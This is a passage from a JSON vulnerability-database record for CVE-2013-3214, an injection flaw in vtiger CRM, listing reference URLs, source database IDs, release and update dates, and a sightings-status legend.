"url": "http://karmainsecurity.com/kis-2013-08\u0027"
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema\","
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/encoding/\""
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema-instance\","
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/envelope/\","
},
{
"trust": 0.1,
"url": "http://karmainsecurity.com/kis-2013-07\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-3215"
},
{
"trust": 0.1,
"url": "http://www.vtiger.com/products/crm\""
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-63216"
},
{
"db": "VULMON",
"id": "CVE-2013-3214"
},
{
"db": "BID",
"id": "61558"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007120"
},
{
"db": "PACKETSTORM",
"id": "122646"
},
{
"db": "PACKETSTORM",
"id": "124698"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-009"
},
{
"db": "NVD",
"id": "CVE-2013-3214"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-63216"
},
{
"db": "VULMON",
"id": "CVE-2013-3214"
},
{
"db": "BID",
"id": "61558"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007120"
},
{
"db": "PACKETSTORM",
"id": "122646"
},
{
"db": "PACKETSTORM",
"id": "124698"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-009"
},
{
"db": "NVD",
"id": "CVE-2013-3214"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-28T00:00:00",
"db": "VULHUB",
"id": "VHN-63216"
},
{
"date": "2020-01-28T00:00:00",
"db": "VULMON",
"id": "CVE-2013-3214"
},
{
"date": "2013-08-01T00:00:00",
"db": "BID",
"id": "61558"
},
{
"date": "2020-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007120"
},
{
"date": "2013-08-01T15:53:32",
"db": "PACKETSTORM",
"id": "122646"
},
{
"date": "2014-01-07T04:14:36",
"db": "PACKETSTORM",
"id": "124698"
},
{
"date": "2013-08-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-009"
},
{
"date": "2020-01-28T21:15:11.733000",
"db": "NVD",
"id": "CVE-2013-3214"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-31T00:00:00",
"db": "VULHUB",
"id": "VHN-63216"
},
{
"date": "2020-01-31T00:00:00",
"db": "VULMON",
"id": "CVE-2013-3214"
},
{
"date": "2014-01-09T06:00:00",
"db": "BID",
"id": "61558"
},
{
"date": "2020-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007120"
},
{
"date": "2020-05-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-009"
},
{
"date": "2020-01-31T19:07:00.973000",
"db": "NVD",
"id": "CVE-2013-3214"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "122646"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-009"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "vtiger\u00a0CRM\u00a0 Vulnerability in injection",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007120"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201308-009"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.